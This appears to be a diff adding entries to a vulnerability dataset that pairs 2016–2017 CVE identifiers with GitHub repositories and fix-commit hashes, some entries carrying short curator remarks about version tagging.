+CVE-2016-6814;https://github.com/apache/groovy;None:None;False;716d3e67e744c7edeed7cbc3f874090d39355764,4df8b652aa018a5d5d1cda8fba938bf3422db31c; +CVE-2016-6816;https://github.com/apache/tomcat;None:None;False;f96f5751d418ae5a2f550be040daf9c5f7d99256,516bda676ac8d0284da3e0295a7df70391315360,cdc0a935c2173aff60039a0b85e57a461381107c; fixed tag is vulnerable (changed) +CVE-2016-6817;https://github.com/apache/tomcat;None:None;False;079372fc7bac8e2e378942715c9ce26a4a72c07a,85c63227edabbfb4f2f500fc557480a190135d21,8568a2ca230f4fb6aee483eb40fc7e3f28bc8b96; +CVE-2016-6823;https://github.com/ImageMagick/ImageMagick;None:None;False;4cc6ec8a4197d4c008577127736bf7985d632323,c1cf4802653970c050d175a6496fa1f11b7c089e; +CVE-2016-7036;https://github.com/mpdavis/python-jose;None:None;False;73007d6887a7517ac07c6e755e494baee49ef513,89b46353b9f611e9da38de3d2fedf52331167b93; +CVE-2016-7528;https://github.com/ImageMagick/ImageMagick;None:None;False;7be16a280014f895a951db4948df316a23dabc09; +CVE-2016-7569;https://github.com/appc/docker2aci;None:None;False;2ab8826d6957d97ed64e5e29a484af6370eae2e1,54331ec7020e102935c31096f336d31f6400064f,e371d6523193342d193bcef9f446e14d09eefc4d; +CVE-2016-8568;https://github.com/libgit2/libgit2;None:None;False;aae89534961cdb7b445be890a056b67c5d18547f,4974e3a59648095ffa6fce6c5b651a820c0c34b9,dfc2c713433b3a932e4d8b648738e3b63086baec,821042b673675546a265827ea184c6fa14e0623d,a719ef5e6d4a1a8ec53469c7914032ed67922772; +CVE-2016-8569;https://github.com/libgit2/libgit2;None:None;False;dfc2c713433b3a932e4d8b648738e3b63086baec,821042b673675546a265827ea184c6fa14e0623d,aae89534961cdb7b445be890a056b67c5d18547f,4974e3a59648095ffa6fce6c5b651a820c0c34b9,a719ef5e6d4a1a8ec53469c7914032ed67922772; +CVE-2016-8579;https://github.com/appc/docker2aci;None:None;False;2ab8826d6957d97ed64e5e29a484af6370eae2e1,54331ec7020e102935c31096f336d31f6400064f,e371d6523193342d193bcef9f446e14d09eefc4d; +CVE-2016-8610;https://github.com/openssl/openssl;None:None;False;af58be768ebb690f78530f796e92b8ae5c9a4401,22646a075e75991b4e8f5d67171e45a6aead5b48; +CVE-2016-8629;https://github.com/keycloak/keycloak;None:None;False;a78cfa4b2ca979a1981fb371cfdf2c7212f7b6e2,3d46b4c425d39b004566cc78164e1ffbe37d647c; +CVE-2016-8640;https://github.com/geopython/pycsw;None:None;False;2565ab332d3ccae328591ea9054d0387a90f2e86,d83df944b1fc0f266444c31852c7730f0f41db87,522873e5ce48bb9cbd4e7e8168ca881ce709c222,69546e13527c82e4f9191769215490381ad511b2,daaf09b4b920708a415be3c7f446739661ba3753; +CVE-2016-8738;https://github.com/apache/struts;None:None;False;554b9dddb0fbd1e581ef577dd62a7c22955ad0f6; +CVE-2016-8739;https://github.com/apache/cxf;None:None;False;8e4970d931ae72f92c54d170a844b37137b8fda6,9deb2d179758d3da47ce3ea492c2606c0a6a8475,d9e2a6e7260ea12efa5355ffdfbf0b2415bccd14; +CVE-2016-8745;https://github.com/apache/tomcat;None:None;False;16a57bc885e212839f1d717b94b01d154a36943a,cbc9b18a845d3c8c053ac293dffda6c6c19dd92b,143bb466cf96a89e791b7db5626055ea819dad89; test file... +CVE-2016-8747;https://github.com/apache/tomcat;None:None;False;9601a937ff3b7ef5d04b2a0e950d0e44e1bb4cbd,452c8094a665ef6375530e81c033da4eeb2e4865; +CVE-2016-8750;https://github.com/apache/karaf;None:None;False;ff5792d9b19997318c487bd23edb2c5063ca88c6,ac07cb2440ceff94b3001728c1611fc471253d19; +CVE-2016-8867;https://github.com/moby/moby;None:None;False;ed879071ecff0e082ae6e59481f640f89ea87013,d60a3418d0268745dff38947bc8c929fbd24f837; +CVE-2016-9015;https://github.com/hbashton/urllib3;None:None;False;056045a062478e3c3afc2402ec81680d53490876,5e36a7096455ea94fb28b623d64e1f1bad97f822; +CVE-2016-9121;https://github.com/square/go-jose;None:None;False;c7581939a3656bb65e89d64da0a52364a33d2507,7f0dd807d3f3d73bb536898cb7980ddf638ce69a,60e9804a61881698227b7b19c0a11d49d6930e4f; +CVE-2016-9122;https://github.com/square/go-jose;None:None;False;2c5656adca9909843c4ff50acf1d2cf8f32da7e6,350b3415970b0dd6d2ffe4574d5fc0a71a900562; +CVE-2016-9189;https://github.com/python-pillow/Pillow;None:None;False;5fac61d03e1619db086e477c67b12189be6f84b6,fe7b41b4381325a83707ea9bbd0062812dc8dfc2,c50ebe6459a131a1ea8ca531f10da616d3ceaa0f; +CVE-2016-9190;https://github.com/python-pillow/Pillow;None:None;False;5fac61d03e1619db086e477c67b12189be6f84b6,5d8a0be45aad78c5a22c8d099118ee26ef8144af,d4663806a89d28e30cbb9f7eac7b03a04f09cb31; +CVE-2016-9243;https://github.com/pyca/cryptography;None:None;False;b924696b2e8731f39696584d12cceeb3aeb2d874,aebfba28a42b608a2c5f8bf7d45402c415b893a4; +CVE-2016-9298;https://github.com/ImageMagick/ImageMagick;None:None;False;3cbfb163cff9e5b8cdeace8312e9bfee810ed02b; +CVE-2016-9814;https://github.com/simplesamlphp/saml2;None:None;False;7008b0916426212c1cc2fc238b38ab9ebff0748c,f72e98a74083e54f49df2596d4520ae5d5fc80f6,3f268c25ca5e9748652834faad04525746227ef7,2a2bd4398257cbe72251c68348be72707cc77262; +CVE-2016-9878;https://github.com/spring-projects/spring-framework;None:None;False;e2d6e709c3c65a4951eb096843ee75d5200cfcad,a7dc48534ea501525f11369d369178a60c2f47d0,43bf008fbcd0d7945e2fcd5e30039bc4d74c7a98; +CVE-2016-9879;https://github.com/spring-projects/spring-security;None:None;False;6d30da2e1f166ceac339899295e1b8a8ff2f08c4,ed2ae21074b7850d386371b2ab9e29268ef2f0c0,666e356ebc479194ba51e43bb99fc42f849b6175; +CVE-2016-9909;https://github.com/html5lib/html5lib-python;None:None;False;9b8d8eb5afbc066b7fac9390f5ec75e5e8a7cab7; +CVE-2016-9910;https://github.com/html5lib/html5lib-python;None:None;False;9b8d8eb5afbc066b7fac9390f5ec75e5e8a7cab7; +CVE-2016-9962;https://github.com/opencontainers/runc;None:None;False;5d93fed3d27f1e2bab58bad13b180a7a81d0b378; +CVE-2016-10033;https://github.com/PHPMailer/PHPMailer;None:None;False;833c35fe39715c3d01934508987e97af1fbc1ba0,9743ff5c7ee16e8d49187bd2e11149afb9485eae,4835657cd639fbd09afd33307cef164edf807cdc,ed4e7ce8ad877a8f578139c491c256ab1933c7c9; +CVE-2016-10100;https://github.com/borgbackup/borg;None:None;False;f2f50efc2873636dc7acfcd222e21fe40fe667a5; +CVE-2016-10127;https://github.com/IdentityPython/pysaml2;None:None;False;8c2b0529efce45b94209da938c89ebdf0a79748d,6e09a25d9b4b7aa7a506853210a9a14100b8bc9b; +CVE-2016-10129;https://github.com/libgit2/libgit2;None:None;False;66e3774d279672ee51c3b54545a79d20d1ada834,2fdef641fd0dd2828bd948234ae86de75221a11a,921e3a68e26ad23d9c5b389fdc61c9591bdc4cff,ccee8cabc3fd187046bbfccb407de95dafc310f6,4ac39c76c0153d1ee6889a0984c39e97731684b2,84d30d569ada986f3eef527cbdb932643c2dd037; +CVE-2016-10149;https://github.com/IdentityPython/pysaml2;None:None;False;6e09a25d9b4b7aa7a506853210a9a14100b8bc9b; +CVE-2016-10173;https://github.com/halostatue/minitar;None:None;False;30e62689b614938dc96b4f2cb8e033e72f650670; +CVE-2016-10190;https://github.com/FFmpeg/FFmpeg;None:None;False;2a05c8f813de6f2278827734bf8102291e7484aa,606b21353df7d08ea203193f3026281737c696a2,2e3f0a1c6f39cf2a35bdda85e43970ffc6db797b,18e3e322b36a85b6f69662e1d5fa7c245638ab86,0e0a413725e0221e1a9d0b7595e22bf57e23a09c; +CVE-2016-10191;https://github.com/FFmpeg/FFmpeg;None:None;False;7d57ca4d9a75562fa32e40766211de150f8b3ee7,5bfb0b02b6fbb38c058659dc09c01602d0d1f523,a5513ae7bc7cb131e7b7edba57e4cf93121d6c8e,b0ebef0578fd88fe3efd66086c43a5b43fbc9f6a,32b95471a86ae383c0f76361d954aec511f7043a; +CVE-2016-10192;https://github.com/FFmpeg/FFmpeg;None:None;False;a5d25faa3f4b18dac737fdb35d0dd68eb0dc2156,e0cb113f9b4b7a26ac0053a483f92c26a4a90f0e,1768e02a046ac05cb212991ae23021ad412cd15a,37904d11779482f375b13da24f33f75daf13638f,c12ee64e80af2517005231388fdf4ea78f16bb0e; +CVE-2016-10193;https://github.com/dejan/espeak-ruby;None:None;False;5251744b13bdd9fb0c72c612226e72d330bac143,119b2d6691ed954c84ceaa6e41a6915e6ea01938; +CVE-2016-10345;https://github.com/phusion/passenger;None:None;False;e5b4b0824d6b648525b4bf63d9fa37e5beeae441; +CVE-2016-10522;https://github.com/sferik/rails_admin;None:None;False;b13e879eb93b661204e9fb5e55f7afa4f397537a; +CVE-2016-10524;https://github.com/oliversalzburg/i18n-node-angular;None:None;False;877720d2d9bb90dc8233706e81ffa03f99fc9dc8; +CVE-2016-10526;https://github.com/tschaub/grunt-gh-pages;None:None;False;2d277e3e969ccd4c2d493f3795400fa77e6b6342,590f69767203d8c379fe18cded93bd5ad6cb53cb; fixed tag is vulnerable +CVE-2016-10528;https://github.com/coderaiser/node-restafary;None:None;False;63e4b13c802991bbff2d0af8bd15b0bce9ff971a; +CVE-2016-10529;https://github.com/silverwind/droppy;None:None;False;62ae2cbc87e0e4b7b61205b3d926e275c8f1accc; +CVE-2016-10531;https://github.com/markedjs/marked;None:None;False;2cff85979be8e7a026a9aca35542c470cf5da523; commit outside the time range +CVE-2016-10532;https://github.com/cloudcmd/console-io;None:None;False;62f0fbcb36226436af0dad52ffe4d8cd9a0c533f; +CVE-2016-10536;https://github.com/socketio/engine.io-client;None:None;False;2c55b278a491bf45313ecc0825cf800e2f7ff5c1; +CVE-2016-10538;https://github.com/node-js-libs/cli;None:None;False;ed90515500557e2b82d6ce6004cc9a81fb090501,fd6bc4d2a901aabe0bb6067fbcc14a4fe3faa8b9; questa boh +CVE-2016-10540;https://github.com/isaacs/minimatch;None:None;False;6944abf9e0694bd22fd9dad293faa40c2bc8a955; +CVE-2016-10542;https://github.com/websockets/ws;None:None;False;0328a8f49f004f98d2913016214e93b2fc2713bc,3e1caf42088c7cd236f23b972917588368ad8531; +CVE-2016-10543;https://github.com/hapijs/call;None:None;False;9570eee5358b4383715cc6a13cb95971678efd30; +CVE-2016-10544;https://github.com/uNetworking/uWebSockets;None:None;False;37deefd01f0875e133ea967122e3a5e421b8fcd9; +CVE-2016-10550;https://github.com/sequelize/sequelize;None:None;False;d198d78182cbf1ea3ef1706740b35813a6aa0838; +CVE-2016-10554;https://github.com/sequelize/sequelize;None:None;False;c876192aa6ce1f67e22b26a4d175b8478615f42d; +CVE-2016-10555;https://github.com/hokaccha/node-jwt-simple;None:None;False;957957cfa44474049b4603b293569588ee9ffd97,ecf908a57fce953b5daf0139bcff85eca869a630; vulnerable tag is fixed +CVE-2016-10556;https://github.com/sequelize/sequelize;None:None;False;23952a2b020cc3571f090e67dae7feb084e1be71; +CVE-2016-10557;https://github.com/appium/appium-chromedriver;None:None;False;c5a4caa8c45cd7842537c2031a77a5273cc198c8,c7e384afcddf009636b8e5bb23b1f06150eda293; +CVE-2016-10558;https://github.com/aerospike/aerospike-client-nodejs;None:None;False;d5e916a3a65c169e60200f18f02524c67bb58237; the fixing commit changes a bash script file and some .ini files, while from the advisory we are filtering out only .js files +CVE-2016-10559;https://github.com/groupon/selenium-download;None:None;False;1957ca79707b9bee224b222500ceb250f736b93b; +CVE-2016-10560;https://github.com/hypery2k/galenframework-cli;None:None;False;dcf9505f77f2ea50f84372f9b6b521c89561cbe1; +CVE-2016-10562;https://github.com/barretts/node-iedriver;None:None;False;32ca1602573618c8d76182c4f2a30aee379d6629; this repo has no tag, current timespan gives zero commits +CVE-2016-10564;https://github.com/rubenv/node-apk-parser;None:None;False;5e359c08ba57775857d309c57f9830f19b1cf774; +CVE-2016-10566;https://github.com/davidmarkclements/install-nw;None:None;False;5c64eff1ed116fceeba55a51867554f0fe4f6556; same as above +CVE-2016-10567;https://github.com/connected-web/product-monitor;None:None;False;122122c605a235d5897590c0ef9d3682961707de; +CVE-2016-10568;https://github.com/geoip-lite/node-geoip;None:None;False;29f9db3f25d6d6364e3e2ab274713e6f81e8c695; fixed tag is vulnerable +CVE-2016-10569;https://github.com/nodeca/embedza;None:None;False;19ab5ed72c37a311ba2685f4ef4ed08b3b5c95c3; +CVE-2016-10570;https://github.com/jefflembeck/pngcrush-installer;None:None;False;cf36e9a5492a591493836b7fea69ae3ec34f7f75,d56bc439fc6ed0654b30b345906f77bd000368f3; +CVE-2016-10571;https://github.com/vseryakov/bkjs-wand;None:None;False;3b8d854dd765546ecb77282a6f87406746378dcf; this repo has no tag, current timespan gives zero commits +CVE-2016-10572;https://github.com/Janpot/mongodb-instance;None:None;False;c8fea750f8020ace8410c442b2684b33a9fddd3b; same as above +CVE-2016-10573;https://github.com/tobli/baryton-saxophone;None:None;False;a5e943c46779e5372cdd13bfe2a69ec2530045be; +CVE-2016-10574;https://github.com/zhao0/node-apk-parser3;None:None;False;ba1ade7f677dc5c80fe3f7355794d501b61a7917; +CVE-2016-10575;https://github.com/hakatashi/kindlegen;None:None;False;9a67ba62890ab78597f4c3af36b97e19ea410fa4; +CVE-2016-10576;https://github.com/zazukoians/fuseki;None:None;False;154c0f12c468a8af33562dff12b1bb0e5b659df9; same as above +CVE-2016-10577;https://github.com/ibmdb/node-ibm_db;None:None;False;d7e2d4b4cbeb6f067df8bba7d0b2ac5d40fcfc19; +CVE-2016-10579;https://github.com/giggio/node-chromedriver;None:None;False;71981099216b7c15ec01e50baaacb15fe1b85e56,5ad68a36c3260760f1eb40d9c7906c6ea19c05b3; was 2.26.0:2.26.1 +CVE-2016-10582;https://github.com/dcodeIO/ClosureCompiler.js;None:None;False;c01efe9d86dc8d07e14c5a6ba1586244ce53a698,e59848f5975e5b15279c044daf9cff8ff192bae6; +CVE-2016-10586;https://github.com/macacajs/macaca-chromedriver;None:None;False;03cb4a186b83122383bc2292761d418f519bf3b9; current timespan gives only ten commits +CVE-2016-10587;https://github.com/wasdk/wasdk;None:None;False;58c2d22e7958d921e4f90d56805460ca33918971; this repo has no tag, current timespan gives zero commits +CVE-2016-10588;https://github.com/nwjs/npm-installer;None:None;False;adb4df1e012d38a3872578d484291b9af07aad5b; unknown +CVE-2016-10591;https://github.com/rse/node-prince;None:None;False;c7e355bd3d3e4bc060f102c5264e838f379aa8a8; +CVE-2016-10611;https://github.com/Strider-CD/strider-sauce;None:None;False;5ff6d6593f89aee505b4e86958ab6f8898baa9eb; +CVE-2016-10626;https://github.com/koorchik/node-mystem3;None:None;False;4bd31c0e0110afc327c414d7ebfc2ffe738cbad2; +CVE-2016-10694;https://github.com/tobli/alto-saxophone;None:None;False;ef8d579ae68a95027afd5204ca644cf00cf72b70; +CVE-2016-10703;https://github.com/jfhbrook/node-ecstatic;None:None;False;71ce93988ead4b561a8592168c72143907189f01; +CVE-2016-10735;https://github.com/twbs/bootstrap;None:None;False;bcad4bcb5f5a9ef079b2883a48a698b35261e083; +CVE-2016-10745;https://github.com/pallets/jinja;None:None;False;9b53045c34e61013dc8f09b7e52a555fa16bed16,74bd64e56387f5b2931040dc7235a3509cde1611; +CVE-2016-10750;https://github.com/hazelcast/hazelcast;None:None;False;5a47697519018eb4918df33a21faae811e85f01a,ef4bea032d9f662bd63c690f4c1d6a2bcea6c2a7; vulnerable tag is fixed + commit timestamp is outside the time interval +CVE-2016-1000232;https://github.com/salesforce/tough-cookie;None:None;False;e4fc2e0f9ee1b7a818d68f0ac7ea696f377b1534,615627206357d997d5e6ff9da158997de05235ae; +CVE-2016-1000236;https://github.com/tj/node-cookie-signature;None:None;False;39791081692e9e14aa62855369e1c7f80fbfd50e; +CVE-2016-1000282;https://github.com/haraka/Haraka;None:None;False;2998b8b0455b8cc2c640344328439e10e685aad9,816af2f47755d36cdcd69f888b173b7ed24d3d89,a772fccad35475dfc66a0ac0c60a60322189f1f5,468fd214ca3ba58ac4b371bd7f7609ca9b1a6699; +CVE-2016-1000338;https://github.com/bcgit/bc-java;None:None;False;b0c3ce99d43d73a096268831d0d120ffc89eac7f; +CVE-2016-1000340;https://github.com/bcgit/bc-java;None:None;False;790642084c4e0cadd47352054f868cc8397e2c00; +CVE-2016-1000343;https://github.com/bcgit/bc-java;None:None;False;50a53068c094d6cff37659da33c9b4505becd389; +CVE-2016-1000344;https://github.com/bcgit/bc-java;None:None;False;9385b0ebd277724b167fe1d1456e3c112112be1f; +CVE-2017-0224;https://github.com/chakra-core/ChakraCore;None:None;False;f022afb8246acc98e74a887bb655ac512caf6e72; +CVE-2017-0904;https://github.com/jtdowney/private_address_check;None:None;False;58a0d7fe31de339c0117160567a5b33ad82b46af; +CVE-2017-0905;https://github.com/recurly/recurly-client-ruby;None:None;False;1bb0284d6e668b8b3d31167790ed6db1f6ccc4be,1605e72ae631d3d300815d23c9eb4d42c1ab2f7e,3b23f442e36a5cc7034abb997312761bd0c15a81,242252e37cdb36cf5bd526855feed388d54a6c7e,9ea7a7dd25778666c3501991df2dabbcfa60f93a,b480ea5118be44dc4a8ee50a501e402be943e9c6,08c4766b75b286193fcd41421d9303fc4d18f1c0,9834a8c6fecffc16f1e9e9c651b67fca07bf64d9,5ff4907e1c1a3d9356e0658ae43cec594b764f09,c8c36508c8acd81768909ad2d155462a9d50a3bd,a6ccc217daa166f8fbc12e32ddeb6d33cf43653e,2ee039868e54eb1bd9a219ff759f008140a9a16b,e540c6535980f216f6d6338c51d11ced3440518b; +CVE-2017-0906;https://github.com/recurly/recurly-client-python;None:None;False;049c74699ce93cf126feff06d632ea63fba36742,c993068ecca65956ec91282f4d15946dcdcf21e0,1af0c48131df43a2f40c41df540ea8b1886c402d,94d08c9ae78448112a61e8586f0253f4dce18485,02d648db134403e53588646084c9cbd9fb0a8177,bd199d12de021bf7e4d3b504d60a11dd0f0beeb6,37762f28f9a3559b603d726e56de899536c4a49d; +CVE-2017-0907;https://github.com/recurly/recurly-client-dotnet;None:None;False;9eef460c0084afd5c24d66220c8b7a381cf9a1f1,54d2f1992096495efb026a97518bb55c5bd70641,56b005dc464132c9c505454042c9d949ace9dc42,c20f49b6cb69564db1af657bdb98aa4ae1da31b5,69aef8ff955b174463e73e234b154eb915787cc3,8e05a530e494e6162997d5a551fefe5ff14d40f0,f0fc3715670a06736b1ba45e7b8a3a525444b524,efe4873ac652f7a992fe1460ec8c9330189b0410,a711b927c8917dd98dc3cecf9f799ba3f3b1d67d; +CVE-2017-0909;https://github.com/jtdowney/private_address_check;None:None;False;516ab853e788f1392f81b59cbe30e136f3836cdf,d1389cbc919aa9e7ef28a34335b104caab73288d,53b55b32dfebd4461a241e09b8af2dbe44d86ce5,6e614921aeee96fa5850f0f667618890754d19a5,6927b2e4ae1ed6c51d1e7639624cf43b0b0e8ba6,4ce63152a1aff6e01e31ff4cc134a485ab018dea; +CVE-2017-0929;https://github.com/dnnsoftware/Dnn.Platform;None:None;False;f7a48e4df93c027325578ff0649733d19e1894fa,d3953db85fee77bb5e6383747692c507ef8b94c3; +CVE-2017-2582;https://github.com/keycloak/keycloak;None:None;False;8a02ef18597e5929517d702238b09ae780eaf421,0cb5ba0f6e83162d221681f47b470c3042eef237; +CVE-2017-2592;https://github.com/openstack/oslo.middleware;None:None;False;ec073669a49267abcb0c1d776b9050342dac5a4a,6c0f50c1f5f4122b31dbfe25aacdce596bf4b648; +CVE-2017-2617;https://github.com/hawtio/hawtio;None:None;False;8cf6848f4d4d4917a4551c9aa49dc00f699eb569; +CVE-2017-2638;https://github.com/infinispan/infinispan;None:None;False;f2d54c4ecb75c7264d4160ca7c461135712201a9; +CVE-2017-2649;https://github.com/jenkinsci/active-directory-plugin;None:None;False;a5e92137dc1f892ebfb3e371725b787860ddb539,063c282ad258c020f1776a6c4b3d1b3f95d74aef; +CVE-2017-2652;https://github.com/jenkinsci/distfork-plugin;None:None;False;312bad498c9bce23a66bd2aba20d0d3de1e0cf8d; +CVE-2017-2667;https://github.com/theforeman/hammer-cli;None:None;False;74b926ae24f47f1d93b778e06b64935e57b60e33; +CVE-2017-2670;https://github.com/undertow-io/undertow;None:None;False;08d6eaf61dab51403990e1fffa4c1d53212e4722,3ad7537d0bfeed5950afda0428ea704e5f00d815,9bfe9fbbb595d51157b61693f072895f7dbadd1d; +CVE-2017-2809;https://github.com/tomoh1r/ansible-vault;None:None;False;3f8f659ef443ab870bb19f95d43543470168ae04; +CVE-2017-3156;https://github.com/apache/cxf;None:None;False;1338469f7d25cfcda75b547c68bed95bd97903ac,e66ce235ee5f8dbde467c8c23eeb622b072d0bf3,555843f9563ccfc2ca1afb2950aebb4505d7711b; +CVE-2017-3204;https://github.com/golang/crypto;None:None;False;e4e2799dd7aab89f583e1d898300d96367750991; +CVE-2017-4952;https://github.com/vmware-archive/xenon;None:None;False;ec30db9afada9cb52852082ce4d7d0095524f3b3,c23964eb57e846126daef98ef7ed15400313e977,b1fd306047ecdac82661d636ebee801a7f2b3a0a,7a747d82b80cd38d2c11a0d9cdedb71c722a2c75,aac1921a1e5480addb1101a513d93dc25de71b50,1a35836973a695157749b0bbbf45b8b2fdcecbd3,756d893573414eec8635c2aba2345c4dcf10b21c,5682ef8d40569afd00fb9a5933e7706bb5b66713,30ae41bccf418d88b52b35a81efb3c1304b798f8,06b9947cf603ba40fd8b03bfeb2e84528a7ab592; +CVE-2017-4971;https://github.com/spring-projects/spring-webflow;None:None;False;57f2ccb66946943fbf3b3f2165eac1c8eb6b1523,ec3d54d2305e6b6bce12f770fec67fe63008d45b; +CVE-2017-4973;https://github.com/cloudfoundry/uaa;None:None;False;9d44cb0c7c25ccae95bfa1c2d59ce46200c643cb; +CVE-2017-4995;https://github.com/spring-projects/spring-security;None:None;False;947d11f433b78294942cb5ea56e8aa5c3a0ca439,5dee8534cd1b92952d10cc56335b5d5856f48f3b; +CVE-2017-5209;https://github.com/libimobiledevice/libplist;None:None;False;3a55ddd3c4c11ce75a86afbefd085d8d397ff957; +CVE-2017-5537;https://github.com/WeblateOrg/weblate;None:None;False;46e7e58af7fba25f9e68a1e962e339da8e829f3b,abe0d2a29a1d8e896bfe829c8461bf8b391f1079; +CVE-2017-5545;https://github.com/libimobiledevice/libplist;None:None;False;7391a506352c009fe044dead7baad9e22dd279ee; +CVE-2017-5591;https://github.com/poezio/slixmpp;None:None;False;22664ee7b86c8e010f312b66d12590fb47160ad8; +CVE-2017-5594;https://github.com/pagekit/pagekit;None:None;False;e0454f9c037c427a5ff76a57e78dbf8cc00c268b,17cc46211ccb3588cc83be96ffa1b971e38d26f0; +CVE-2017-5637;https://github.com/apache/zookeeper;None:None;False;5fe68506f217246c7ebd96803f9c78e13ec2f11a,0313a0e0b6c47b316271533165e5830d1ca04478,835377f0e1cd215e791ed29c0bcff95e625f299c,6d9fc04c052adbc79bbbb1c63f3f00c816fb8e56; +CVE-2017-5638;https://github.com/apache/struts;None:None;False;352306493971e7d5a756d61780d57a76eb1f519a,6b8272ce47160036ed120a48345d9aa884477228; fixed tag is vulnerable (changed) (adv specify wrong) +CVE-2017-5641;https://github.com/apache/flex-blazeds;None:None;False;f861f0993c35e664906609cad275e45a71e2aaf1; +CVE-2017-5643;https://github.com/apache/camel;None:None;False;8afc5d1757795fde715902067360af5d90f046da,2c6964ae94d8f9a9c9a32e5ae5a0b794e8b8d3be,9f7376abbff7434794f2c7c2909e02bac232fb5b; extracted wrong vers from CPE. +CVE-2017-5645;https://github.com/apache/logging-log4j2;None:None;False;5dcc19215827db29c993d0305ee2b0d8dd05939d; +CVE-2017-5858;https://github.com/conversejs/converse.js;None:None;False;e81eaf323ef241f364f0ea8b6abb53439e20efcc; +CVE-2017-5934;https://github.com/moinwiki/moin-1.9;None:None;False;70955a8eae091cc88fd9a6e510177e70289ec024; +CVE-2017-5936;https://github.com/openstack-archive/nova-lxd;None:None;False;1b76cefb92081efa1e88cd8f330253f857028bd2; +CVE-2017-5946;https://github.com/rubyzip/rubyzip;None:None;False;ce4208fdecc2ad079b05d3c49d70fe6ed1d07016; +CVE-2017-5954;https://github.com/commenthol/serialize-to-js;None:None;False;0cea49eeb56eb30f6ee121524b7ea8ed208ab10d,1cd433960e5b9db4c0b537afb28366198a319429; +CVE-2017-7481;https://github.com/ansible/ansible;None:None;False;f0e348f5eeb70c1fb3127d90891da43b5c0a9d29,a1886911fcf4b691130cfc70dfc5daa5e07c46a3,fd30f5328986f9e1da434474481f32bf918a600c,ed56f51f185a1ffd7ea57130d260098686fcc7c2; +CVE-2017-7525;https://github.com/FasterXML/jackson-databind;None:None;False;60d459cedcf079c6106ae7da2ac562bc32dcabe1,6ce32ffd18facac6abdbbf559c817b47fcb622c1; one was wrong from tracer, another was just test files the one in advisory does not exist is from another repo +CVE-2017-7536;https://github.com/hibernate/hibernate-validator;None:None;False;0886e89900d343ea20fde5137c9a3086e6da9ac9,0ed45f37c4680998167179e631113a2c9cb5d113,0778a5c98b817771a645c6f4ba0b28dd8b5437b8; +CVE-2017-7540;https://github.com/svenfuchs/safemode;None:None;False;a019520e441dab1a277fa9aeb41e9266783e9533; was 1.3.2:1.3.3 +CVE-2017-7545;https://github.com/kiegroup/jbpm-designer;None:None;False;a143f3b92a6a5a527d929d68c02a0c5d914ab81d,d9c355a53f0102e71cc668cd8fca440f5f46bdf1,cede7932601439cbc1c3708d0b5bb61f3601abe1; +CVE-2017-7653;https://github.com/eclipse/mosquitto;None:None;False;b11855821e5848fdbb6f66b609b2e1c25c7ddb8a,729a09310a7a56fbe5933b70b4588049da1a42b4; +CVE-2017-7654;https://github.com/eclipse/mosquitto;None:None;False;51ec5601c2ec523bf2973fdc1eca77335eafb8de; +CVE-2017-7656;https://github.com/eclipse/jetty.project;None:None;False;a285deea42fcab60d9edcf994e458c238a348b55; +CVE-2017-7657;https://github.com/eclipse/jetty.project;None:None;False;a285deea42fcab60d9edcf994e458c238a348b55,be8ff431a4b9b2e51c4c847512dfbc70166b8089; +CVE-2017-7660;https://github.com/apache/lucene-solr;None:None;False;e3b0cfff396a7f92a4f621d598780116da916f3f,2f5ecbcf9ed7a3a4fd37b5c55860ad8eace1beae,e912b7cb5c68fbb87b874d41068cf5a3aea17da0,9f91c619a35db89544f5c85795df4128c9f0d96a; +CVE-2017-7661;https://github.com/apache/cxf-fediz;None:None;False;acdbe8c213576792dd95d87315bcc181ea61b57f,f368c472e7beb26f8ca6f818eee8139d8caf2e6e,707b8f95395a3a9ba6d2643053578081e91e5673; +CVE-2017-7662;https://github.com/apache/cxf-fediz;None:None;False;c68e4820816c19241568f4a8fe8600bffb0243cd,71480c3f7e516cf0d535fdd5abec63ab455e4d06; +CVE-2017-7666;https://github.com/apache/openmeetings;None:None;False;aadcd3e4eaaba5a6d322eb53f48c3bbb4fd7a5da,44800f8a18c7e9a30b379ef057067cb26181b532; +CVE-2017-7674;https://github.com/apache/tomcat;None:None;False;b94478d45b7e1fc06134a785571f78772fa30fed; +CVE-2017-7675;https://github.com/apache/tomcat;None:None;False;dacb030b85fe0e0b3da87469e23d0f31252fdede,cf181edc9a8c239cde704cffc3c503425bdcae2b; +CVE-2017-7688;https://github.com/apache/openmeetings;None:None;False;13fe2f382240eab90f3050ecb7ea84d7121f4081; +CVE-2017-7860;https://github.com/grpc/grpc;None:None;False;f05359f6975003197d83ec5a1b78893e01000f99,bcd5f12e4bca2ed2c00cddb5ffd046aef6f4fb31,e2869fee8db5f7a94858b551089c45bbb1bd943b,d9314adb8e3bc687d15269c6e25554741ded4ea6,5f13f4898612c136cff1f2d04a91c25b6d4b694a; unknown, version not specified properly +CVE-2017-7861;https://github.com/grpc/grpc;None:None;False;f05359f6975003197d83ec5a1b78893e01000f99,bcd5f12e4bca2ed2c00cddb5ffd046aef6f4fb31,e2869fee8db5f7a94858b551089c45bbb1bd943b,d9314adb8e3bc687d15269c6e25554741ded4ea6,5f13f4898612c136cff1f2d04a91c25b6d4b694a; unknown, version not specified properly +CVE-2017-7957;https://github.com/x-stream/xstream;None:None;False;b3570be2f39234e61f99f9a20640756ea71b1b40,6e546ec366419158b1e393211be6d78ab9604abe; +CVE-2017-8028;https://github.com/spring-projects/spring-ldap;None:None;False;08e8ae289bbd1b581986c7238604a147119c1336; +CVE-2017-8045;https://github.com/spring-projects/spring-amqp;None:None;False;36e55998f6352ba3498be950ccab1d5f4d0ce655,83fe9fdec2c86a57898d56c5e109debd9d5c07d9,296d481f980fcbecbee01244e3644e254470a86e,6e9e00bb5bf0aa88444146db3c2eae138cc7b0a1; +CVE-2017-8046;https://github.com/spring-projects/spring-data-rest;None:None;False;f5bfe5358864de1a15566110de7ad7e5ffb48e99,8f269e28fe8038a6c60f31a1c36cfda04795ab45,824e51a1304bbc8334ac0b96ffaef588177e6ccd; vulnerable tag is fixed, but wrong tagging I believe +CVE-2017-8109;https://github.com/saltstack/salt;None:None;False;8492cef7a5c8871a3978ffc2f6e48b3b960e0151,6e34c2b5e5e849302af7ccd00509929c3809c658; +CVE-2017-8342;https://github.com/Kozea/Radicale;None:None;False;190b1dd795f0c552a4992445a231da760211183b,059ba8dec1f22ccbeab837e288b3833a099cee2d; +CVE-2017-8359;https://github.com/grpc/grpc;None:None;False;aab6992c006be6fb80df73fd9f218365099c016d,6544a2d5d9ecdb64214da1d228886a7d15bbf5c7; +CVE-2017-8418;https://github.com/rubocop/rubocop;None:None;False;dcb258fabd5f2624c1ea0e1634763094590c09d7; 